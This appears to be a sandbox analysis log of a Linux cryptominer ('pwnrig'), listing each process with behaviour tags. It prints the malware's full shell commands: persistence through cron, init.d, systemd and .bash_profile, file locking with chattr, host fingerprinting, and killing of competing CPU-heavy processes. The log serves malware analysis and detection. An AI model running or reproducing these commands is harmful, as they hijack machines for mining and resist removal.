/usr/bin/awkawk "{print \$1}"1⤵PID:3699
-
/usr/bin/grepgrep "Port "1⤵PID:3702
-
/usr/bin/headhead -n 11⤵PID:3703
-
/usr/bin/catcat /etc/ssh/sshd_config1⤵PID:3701
-
/usr/bin/awkawk "{print \"-\"\$2}"1⤵PID:3704
-
/usr/bin/sedsed -e "s/\$//"1⤵PID:3713
-
/usr/bin/sedsed -e "s/^ *//"1⤵PID:3712
-
/usr/bin/cutcut -d: -f21⤵PID:3711
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo1⤵
- Checks CPU configuration
PID:3710
-
/usr/bin/awkawk "{print \$1}"1⤵PID:3716
-
/usr/bin/awkawk "{print \$4}"1⤵PID:3719
-
/usr/bin/awkawk "{print \$4}"1⤵PID:3722
-
/usr/bin/grepgrep -- "-bash[[:space:]]*\$"1⤵PID:3747
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"1⤵PID:3748
-
/usr/bin/grepgrep -v grep1⤵PID:3746
-
/usr/bin/wcwc -l1⤵PID:3749
-
/usr/bin/psps aux1⤵
- Reads runtime system information
PID:3745
-
/usr/bin/crontabcrontab -r1⤵PID:3755
-
/usr/bin/pkillpkill -f .klibsystem51⤵
- Reads CPU attributes
- Reads runtime system information
PID:3756
-
/usr/bin/pkillpkill -f .klibsystem41⤵
- Reads CPU attributes
PID:3757
-
/usr/bin/bashbash -c "echo \"* * * * * /home/.klibsystem5 >/dev/null 2>&1\" | crontab -"1⤵PID:3758
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:3760
-
-
/usr/bin/chattrchattr -ia /etc/cron.d/.lib-knlib41⤵
- Attempts to change immutable files
PID:3761
-
/usr/bin/chattrchattr +ia /etc/cron.d/.lib-knlib41⤵
- Attempts to change immutable files
PID:3762
-
/usr/bin/chattrchattr -ia /var/spool/cron/.lib-knlib41⤵PID:3763
-
/usr/bin/chattrchattr +ia /var/spool/cron/.lib-knlib41⤵PID:3764
-
/usr/bin/chattrchattr -ia /etc/cron.hourly/.lib-knlib41⤵PID:3765
-
/usr/bin/chattrchattr +ia /etc/cron.hourly/.lib-knlib41⤵PID:3766
-
/usr/bin/chattrchattr -ia /etc/cron.daily/.lib-knlib41⤵
- Attempts to change immutable files
PID:3767
-
/usr/bin/chattrchattr +ia /etc/cron.daily/.lib-knlib41⤵PID:3768
-
/usr/bin/chattrchattr -ia /etc/cron.weekly/.lib-knlib41⤵PID:3769
-
/usr/bin/chattrchattr +ia /etc/cron.weekly/.lib-knlib41⤵PID:3770
-
/usr/bin/chattrchattr -ia /etc/cron.monthly/.lib-knlib41⤵
- Attempts to change immutable files
PID:3771
-
/usr/bin/chattrchattr +ia /etc/cron.monthly/.lib-knlib41⤵PID:3772
-
/usr/bin/chattrchattr -ia /etc/anacrontab1⤵
- Attempts to change immutable files
PID:3773
-
/usr/bin/chattrchattr +ia /etc/anacrontab1⤵PID:3774
-
/tmp/sys-helper/tmp/sys-helper1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:3775
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn1⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
PID:3776 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""2⤵
- Attempts to change immutable files
PID:3777 -
/usr/bin/whoamiwhoami3⤵PID:3788
-
-
/usr/bin/hostnamehostname3⤵PID:3789
-
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo3⤵
- Checks CPU configuration
PID:3790
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵PID:3806
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"3⤵PID:3808
-
-
/usr/bin/psps -A "-ostat,ppid"3⤵
- Reads CPU attributes
PID:3807
-
-
/usr/bin/idid -u3⤵PID:3810
-
-
/usr/bin/grepgrep -v grep3⤵PID:3813
-
-
/usr/bin/grepgrep /etc/cron3⤵PID:3812
-
-
/usr/bin/psps x3⤵PID:3811
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/service-agent';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"2⤵
- Attempts to change immutable files
- Writes file to tmp directory
PID:3815 -
/usr/bin/idid -u3⤵PID:3816
-
-
/usr/bin/idid -u3⤵PID:3817
-
-
/usr/bin/chattrchattr -i -a /bin/bprofr "~/.bash_profile"3⤵PID:3818
-
-
/usr/bin/rmrm -rf /bin/bprofr3⤵PID:3819
-
-
/usr/bin/sedsed -i /bprofr/d "~/.bash_profile"3⤵PID:3820
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/bprofr3⤵
- Writes file to system bin folder
PID:3821
-
-
/usr/bin/idid -u3⤵PID:3822
-
-
/usr/bin/chattrchattr +i +a /bin/bprofr "~/.bash_profile"3⤵
- Attempts to change immutable files
PID:3823
-
-
/usr/bin/mkdirmkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly3⤵PID:3824
-
-
/usr/bin/chattrchattr -i -a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr3⤵PID:3825
-
-
/usr/bin/rmrm -rf /bin/crondr3⤵PID:3826
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/crondr3⤵
- Writes file to system bin folder
PID:3827
-
-
/usr/bin/teetee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig3⤵
- Creates/modifies Cron job
PID:3829
-
-
/usr/bin/sedsed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig3⤵
- Creates/modifies Cron job
PID:3830
-
-
/usr/bin/chmodchmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr3⤵PID:3831
-
-
/usr/bin/chattrchattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr3⤵
- Attempts to change immutable files
PID:3832
-
-
/usr/bin/whichwhich chkconfig3⤵PID:3833
-
-
/usr/bin/whichwhich update-rc.d3⤵PID:3834
-
-
/usr/bin/chattrchattr -i -a /etc/init.d/pwnrig /bin/initdr3⤵PID:3835
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig disable3⤵PID:3836
-
/usr/local/sbin/systemctlsystemctl --quiet disable pwnrig4⤵PID:3837
-
-
/usr/local/bin/systemctlsystemctl --quiet disable pwnrig4⤵PID:3837
-
-
/usr/sbin/systemctlsystemctl --quiet disable pwnrig4⤵PID:3837
-
-
/usr/bin/systemctlsystemctl --quiet disable pwnrig4⤵
- Reads EFI boot settings
PID:3837
-
-
/usr/local/sbin/systemctlsystemctl daemon-reload4⤵PID:3863
-
-
/usr/local/bin/systemctlsystemctl daemon-reload4⤵PID:3863
-
-
/usr/sbin/systemctlsystemctl daemon-reload4⤵PID:3863
-
-
/usr/bin/systemctlsystemctl daemon-reload4⤵
- Reads EFI boot settings
PID:3863
-
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig remove3⤵PID:3889
-
/usr/local/sbin/systemctlsystemctl daemon-reload4⤵PID:3890
-
-
/usr/local/bin/systemctlsystemctl daemon-reload4⤵PID:3890
-
-
/usr/sbin/systemctlsystemctl daemon-reload4⤵PID:3890
-
-
/usr/bin/systemctlsystemctl daemon-reload4⤵
- Reads EFI boot settings
PID:3890
-
-
-
/usr/bin/rmrm -rf /bin/initdr3⤵PID:3916
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/initdr3⤵
- Writes file to system bin folder
PID:3917
-
-
/usr/bin/teetee /etc/init.d/pwnrig3⤵
- Modifies init.d
PID:3919
-
-
/usr/bin/sedsed -i "1 s/-e //" /etc/init.d/pwnrig3⤵
- Modifies init.d
PID:3920
-
-
/usr/bin/chmodchmod +x /etc/init.d/pwnrig /bin/initdr3⤵PID:3921
-
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig defaults3⤵PID:3922
-
-
/usr/bin/chattrchattr +i +a /etc/init.d/pwnrig /bin/initdr3⤵PID:3977
-
-
/usr/bin/whichwhich systemctl3⤵PID:3978
-
-
/usr/bin/chattrchattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr3⤵PID:3979
-
-
/usr/bin/rmrm -rf /bin/sysdr3⤵PID:3980
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/sysdr3⤵
- Writes file to system bin folder
PID:3981
-
-
/usr/bin/teetee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service3⤵
- Modifies systemd
PID:3983
-
-
/usr/bin/sedsed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service3⤵
- Attempts to change immutable files
PID:3984
-
-
/usr/bin/chattrchattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr3⤵PID:3985
-
-
/usr/bin/systemctlsystemctl enable pwnrige.service3⤵
- Reads EFI boot settings
PID:3986
-
-
/usr/bin/systemctlsystemctl enable pwnrigl.service3⤵
- Reads EFI boot settings
PID:4012
-
-
/usr/bin/systemctlsystemctl daemon-reload3⤵
- Reads EFI boot settings
PID:4038
-
-
/usr/bin/systemctlsystemctl reload-or-restart pwnrige.service3⤵
- Reads EFI boot settings
PID:4064
-
-
-
/usr/bin/hostnamehostname -I1⤵PID:3780
-
/usr/bin/awkawk "{print \$1}"1⤵PID:3782
-
/usr/bin/grepgrep "Port "1⤵PID:3785
-
/usr/bin/awkawk "{print \"-\"\$2}"1⤵PID:3787
-
/usr/bin/headhead -n 11⤵PID:3786
-
/usr/bin/catcat /etc/ssh/sshd_config1⤵PID:3784
-
/usr/bin/sedsed -e "s/\$//"1⤵PID:3796
-
/usr/bin/sedsed -e "s/^ *//"1⤵PID:3795
-
/usr/bin/cutcut -d: -f21⤵PID:3794
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo1⤵
- Checks CPU configuration
PID:3793
-
/usr/bin/awkawk "{print \$1}"1⤵PID:3799
-
/usr/bin/awkawk "{print \$4}"1⤵PID:3802
-
/usr/bin/awkawk "{print \$4}"1⤵PID:3805
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d1⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads hardware information
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:4121 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""2⤵PID:4145
-
/usr/bin/whoamiwhoami3⤵PID:4156
-
-
/usr/bin/hostnamehostname3⤵PID:4157
-
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo3⤵
- Checks CPU configuration
PID:4158
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵PID:4174
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"3⤵PID:4176
-
-
/usr/bin/psps -A "-ostat,ppid"3⤵
- Reads runtime system information
PID:4175
-
-
/usr/bin/idid -u3⤵PID:4178
-
-
/usr/bin/grepgrep -v grep3⤵PID:4181
-
-
/usr/bin/grepgrep /etc/cron3⤵PID:4180
-
-
/usr/bin/psps x3⤵
- Reads CPU attributes
- Reads runtime system information
PID:4179
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵PID:4183
-
/usr/bin/idid -u3⤵PID:4184
-
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"3⤵PID:4189
-
-
/usr/bin/grepgrep -v /usr/sbin/httpd3⤵PID:4188
-
-
/usr/bin/grepgrep -v -- "-bash[[:space:]]*\$"3⤵PID:4187
-
-
/usr/bin/grepgrep -v grep3⤵PID:4186
-
-
/usr/bin/psps aux3⤵PID:4185
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"2⤵PID:4191
-
/usr/bin/idid -u3⤵PID:4192
-
-
-
/usr/bin/hostnamehostname -I1⤵PID:4148
-
/usr/bin/awkawk "{print \$1}"1⤵PID:4150
-
/usr/bin/awkawk "{print \"-\"\$2}"1⤵PID:4155
-
/usr/bin/headhead -n 11⤵PID:4154
-
/usr/bin/grepgrep "Port "1⤵PID:4153
-
/usr/bin/catcat /etc/ssh/sshd_config1⤵PID:4152
-
/usr/bin/sedsed -e "s/\$//"1⤵PID:4164
-
/usr/bin/sedsed -e "s/^ *//"1⤵PID:4163
-
/usr/bin/cutcut -d: -f21⤵PID:4162
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo1⤵
- Checks CPU configuration
PID:4161
-
/usr/bin/awkawk "{print \$1}"1⤵PID:4167
-
/usr/bin/awkawk "{print \$4}"1⤵PID:4170
-
/usr/bin/awkawk "{print \$4}"1⤵PID:4173
-
/usr/bin/wcwc -l1⤵PID:4198
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"1⤵PID:4197
-
/usr/bin/grepgrep -- "-bash[[:space:]]*\$"1⤵PID:4196
-
/usr/bin/grepgrep -v grep1⤵PID:4195
-
/usr/bin/psps aux1⤵
- Reads runtime system information
PID:4194
-
/usr/bin/crontabcrontab -r1⤵PID:4212
-
/usr/bin/pkillpkill -f .klibsystem51⤵
- Reads runtime system information
PID:4213
-
/usr/bin/pkillpkill -f .klibsystem41⤵
- Reads CPU attributes
PID:4214
-
/usr/bin/bashbash -c "echo \"* * * * * /home/.klibsystem5 >/dev/null 2>&1\" | crontab -"1⤵PID:4215
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:4217
-
-
/tmp/sys-helper/tmp/sys-helper1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:4218
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn1⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
PID:4219 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""2⤵PID:4220
-
/usr/bin/whoamiwhoami3⤵PID:4231
-
-
/usr/bin/hostnamehostname3⤵PID:4232
-
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo3⤵
- Checks CPU configuration
PID:4233
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵PID:4249
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"3⤵PID:4251
-
-
/usr/bin/psps -A "-ostat,ppid"3⤵PID:4250
-
-
/usr/bin/idid -u3⤵PID:4253
-
-
/usr/bin/grepgrep -v grep3⤵PID:4256
-
-
/usr/bin/grepgrep /etc/cron3⤵PID:4255
-
-
/usr/bin/psps x3⤵
- Reads runtime system information
PID:4254
-
-
-
